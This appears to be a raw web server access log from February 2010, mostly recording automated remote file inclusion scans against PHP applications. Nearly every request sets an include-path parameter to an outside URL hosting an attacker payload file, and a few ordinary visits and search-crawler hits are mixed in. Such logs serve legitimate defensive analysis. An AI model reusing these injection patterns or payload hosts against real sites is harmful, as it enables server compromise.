200.93.147.154 - - [24/Feb/2010:04:00:27 -0800] "GET /logs/access_100130.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:04:00:29 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:04:00:29 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:04:00:30 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.242.113.160 - - [24/Feb/2010:04:01:01 -0800] "GET /logs/access_100201.log%20%20//_head.php?_zb_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.242.113.160 - - [24/Feb/2010:04:01:01 -0800] "GET /_head.php?_zb_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.242.113.160 - - [24/Feb/2010:04:01:01 -0800] "GET /logs//_head.php?_zb_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:04:01:16 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:04:01:19 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [24/Feb/2010:04:02:13 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://nimh.snmh.go.kr/bbs/data/.../id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [24/Feb/2010:04:02:13 -0800] "GET /bbs/write_update.php?board_skin_path=http://nimh.snmh.go.kr/bbs/data/.../id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [24/Feb/2010:04:02:13 -0800] "GET /logs/access_100121.log%20%20//bbs/write_update.php?board_skin_path=http://nimh.snmh.go.kr/bbs/data/.../id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [24/Feb/2010:04:02:34 -0800] "GET /logs/access_100213.log/index.php?option=com_contact&Itemid=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [24/Feb/2010:04:02:39 -0800] "GET /bbs/write_update.php?board_skin_path=http://nimh.snmh.go.kr/bbs/data/.../id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [24/Feb/2010:04:02:39 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://nimh.snmh.go.kr/bbs/data/.../id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [24/Feb/2010:04:02:39 -0800] "GET /logs/access_100121.log%20%20//bbs/write_update.php?board_skin_path=http://nimh.snmh.go.kr/bbs/data/.../id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:04:17 -0800] "GET //bbs/delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:04:17 -0800] "GET /logs/access_100202.log%20%20///bbs/delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:04:17 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:04:17 -0800] "GET /logs/access_100205.log%20%20///bbs/delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:04:21 -0800] "GET /logs/access_100216.log///?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:04:22 -0800] "GET /logs/access_100130.log///?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [24/Feb/2010:04:04:26 -0800] "GET /logs/access_100126.log%20%20///main.php?_SERVER[DOCUMENT_ROOT]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [24/Feb/2010:04:04:26 -0800] "GET //main.php?_SERVER[DOCUMENT_ROOT]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [24/Feb/2010:04:04:26 -0800] "GET /logs///main.php?_SERVER[DOCUMENT_ROOT]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:04:43 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:04:43 -0800] "GET /logs/access_100202.log%20%20///bbs/delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:04:43 -0800] "GET //bbs/delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:04:43 -0800] "GET /logs/access_100205.log%20%20///bbs/delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.64.175.207 - - [24/Feb/2010:04:04:51 -0800] "GET / HTTP/1.1" 200 2392 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.00" "pixero.net"
80.64.175.207 - - [24/Feb/2010:04:04:51 -0800] "GET /pnetsite/i/main.png HTTP/1.0" 200 8564 "http://pixero.net/" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.00" "pixero.net"
80.64.175.207 - - [24/Feb/2010:04:04:51 -0800] "GET /pnetsite/fav.ico HTTP/1.1" 200 1406 "http://pixero.net/" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.00" "pixero.net"
80.64.175.207 - - [24/Feb/2010:04:04:51 -0800] "GET /pnetsite/i/background.gif HTTP/1.1" 200 206161 "http://pixero.net/" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.00" "pixero.net"
69.112.170.135 - - [24/Feb/2010:04:07:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:04:07:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:04:07:53 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [24/Feb/2010:04:08:39 -0800] "GET /logs/access_100210.log//write_comment_update.php?board_skin_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [24/Feb/2010:04:08:47 -0800] "GET /logs/access_100202.log//write_comment_update.php?board_skin_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.242.113.160 - - [24/Feb/2010:04:10:25 -0800] "GET /logs/access_100201.log//_head.php?_zb_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.56.65.218 - - [24/Feb/2010:04:14:46 -0800] "GET /robots.txt HTTP/1.0" 200 36 "http://www.puaga.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
64.56.65.218 - - [24/Feb/2010:04:14:47 -0800] "GET / HTTP/1.0" 200 3626 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
64.56.65.218 - - [24/Feb/2010:04:14:56 -0800] "GET /robots.txt HTTP/1.0" 200 36 "http://www.puaga.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
64.56.65.218 - - [24/Feb/2010:04:14:57 -0800] "GET /style/imagehover.js HTTP/1.0" 200 1410 "http://www.puaga.com/style/imagehover.js" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
67.195.37.171 - - [24/Feb/2010:04:15:11 -0800] "GET /logs/access_100129.log HTTP/1.0" 200 1559692 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:04:20:22 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:04:20:22 -0800] "GET /logs/access_100217.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:04:20:22 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:04:21:50 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:04:21:50 -0800] "GET /logs/access_100217.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:04:21:50 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [24/Feb/2010:04:22:03 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [24/Feb/2010:04:22:03 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [24/Feb/2010:04:22:03 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:04:23:00 -0800] "GET /logs/access_100219.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:04:23:59 -0800] "GET /logs/access_100219.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [24/Feb/2010:04:24:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [24/Feb/2010:04:24:28 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [24/Feb/2010:04:24:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [24/Feb/2010:04:25:26 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.171 - - [24/Feb/2010:04:27:05 -0800] "GET /logs/access_100201.log HTTP/1.0" 200 1347886 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:27:47 -0800] "GET /logs/access_100119.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:27:47 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:27:47 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:27:50 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:27:50 -0800] "GET /logs//westerville-oh-local-authors/index.php?page=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:27:50 -0800] "GET /logs/access_100110.log//westerville-oh-local-authors/index.php?page=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:27:50 -0800] "GET /westerville-oh-local-authors/index.php?page=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [24/Feb/2010:04:31:18 -0800] "GET /logs/access_100203.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:04:33:17 -0800] "GET /logs/access_091220.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:04:33:17 -0800] "GET //admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:04:33:17 -0800] "GET /logs///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:35:03 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:35:03 -0800] "GET /logs/access_100209.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:35:03 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:35:13 -0800] "GET /logs/access_100203.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [24/Feb/2010:04:36:04 -0800] "GET /logs/access_100125.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:04:36:56 -0800] "GET /main.php?pagina=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:04:36:56 -0800] "GET /logs/access_100202.log%20%20/main.php?pagina=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:04:36:56 -0800] "GET /logs/main.php?pagina=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:04:37:27 -0800] "GET /logs/access_100214.log//index.php?option=com_serverstat&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:04:37:27 -0800] "GET /logs//index.php?option=com_serverstat&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:04:37:27 -0800] "GET /logs/access_100218.log//index.php?option=com_serverstat&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:04:37:27 -0800] "GET /index.php?option=com_serverstat&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:37:28 -0800] "GET /logs/access_100209.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:37:28 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:37:28 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:37:28 -0800] "GET /logs/access_100203.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:37:29 -0800] "GET /logs/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:37:29 -0800] "GET /artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:37:29 -0800] "GET /logs/access_100203.log%20%20/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:37:46 -0800] "GET /logs/access_100203.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:37:46 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:37:46 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:37:51 -0800] "GET /logs/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:37:51 -0800] "GET /artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:37:52 -0800] "GET /logs/access_100203.log%20%20/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:37:52 -0800] "GET /artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:37:52 -0800] "GET /logs/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:37:52 -0800] "GET /logs/access_100203.log%20%20/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:37:53 -0800] "GET /artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:37:53 -0800] "GET /logs/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:37:53 -0800] "GET /logs/access_100203.log%20%20/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:37:57 -0800] "GET /logs/access_100203.log/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:37:57 -0800] "GET /logs/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:37:58 -0800] "GET /artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:37:58 -0800] "GET /logs/access_100203.log/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:37:58 -0800] "GET /logs/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:37:58 -0800] "GET /artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [24/Feb/2010:04:37:59 -0800] "GET //admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [24/Feb/2010:04:37:59 -0800] "GET /logs///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [24/Feb/2010:04:37:59 -0800] "GET /logs/access_091220.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:38:04 -0800] "GET /logs/access_100203.log/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:38:04 -0800] "GET /logs/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
